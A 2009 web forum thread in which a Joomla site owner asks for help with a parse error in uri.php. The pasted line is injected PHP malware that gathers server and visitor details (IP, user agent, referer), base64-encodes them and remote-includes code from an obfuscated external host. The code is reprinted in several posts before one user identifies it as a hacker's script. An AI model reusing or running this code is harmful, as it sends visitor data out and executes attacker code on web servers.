vlastanovak Posted June 26, 2009 Share Posted June 26, 2009 Hi guys, I've not had any problems in the past and my site has been operational for months - I also haven't made any changes to my site in weeks.. BUT all of a sudden I am getting the following error message when trying to access my Joomla installation; Parse error: syntax error, unexpected '"', expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/ausnzcla/public_html/libraries/joomla/environment/uri.php on line 741 So I have isolated the line and the line is; $regex = "<^(([^:/?#]+)?(//([^/?#]*))?([^?#]*)(\\?([^#]*))?(#(.*))error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>"; Does anyone have any idea where the error is? SITE URL: http://ausnzclancentral.com Thanks. Quote Link to comment Share on other sites More sharing options...
WolfRage Posted June 26, 2009 Share Posted June 26, 2009 The problem is you are breaking in and out of quotes in the statement at the wrong times. As you can see when the syntax is properly highlighted as below. But I do not know how the program intends to use this line. But I think you need to use single quotes at the beginning and end of the statement. <?php $regex = "<^(([^:/?#] )?(//([^/?#]*))?([^?#]*)(\\?([^#]*))?(#(.*))error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>"; ?> Quote Link to comment Share on other sites More sharing options...
vlastanovak Posted June 26, 2009 Author Share Posted June 26, 2009 OK, thanks for replying. My coding ability is below average and I'm not sure what I need to do to fix the problem. I am using the Joomla CMS - and cannot access the front end or the back end because of this error. Quote Link to comment Share on other sites More sharing options...
WolfRage Posted June 26, 2009 Share Posted June 26, 2009 Well try this, and report back what happens. <?php $regex = '<^(([^:/?#] )?(//([^/?#]*))?([^?#]*)(\\?([^#]*))?(#(.*))error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>'; ?> Just in case the preview is not showing the single quote that I put in immediately following the equal sign, make sure it is there. Quote Link to comment Share on other sites More sharing options...
vlastanovak Posted June 26, 2009 Author Share Posted June 26, 2009 OK, now there's no error message at all - just a blank page. http://ausnzclancentral.com Hmm.. Quote Link to comment Share on other sites More sharing options...
natepizzle Posted June 26, 2009 Share Posted June 26, 2009 Can you attach the /home/ausnzcla/public_html/libraries/joomla/environment/uri.php file to the thread so we may help further. Quote Link to comment Share on other sites More sharing options...
Advocate Posted June 27, 2009 Share Posted June 27, 2009 To anyone trying to debug this script: do not run it on your own server! The script is a hacker's attempt to send your server data (including your user's IP addresses) to the hacker's server. Related question: http://forums.devnetwork.net/viewtopic.php?t=102299 Quote Link to comment Share on other sites More sharing options...
vlastanovak Posted June 27, 2009 Author Share Posted June 27, 2009 So what should I do? Quote Link to comment Share on other sites More sharing options...
Advocate Posted June 27, 2009 Share Posted June 27, 2009 See the other forum. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.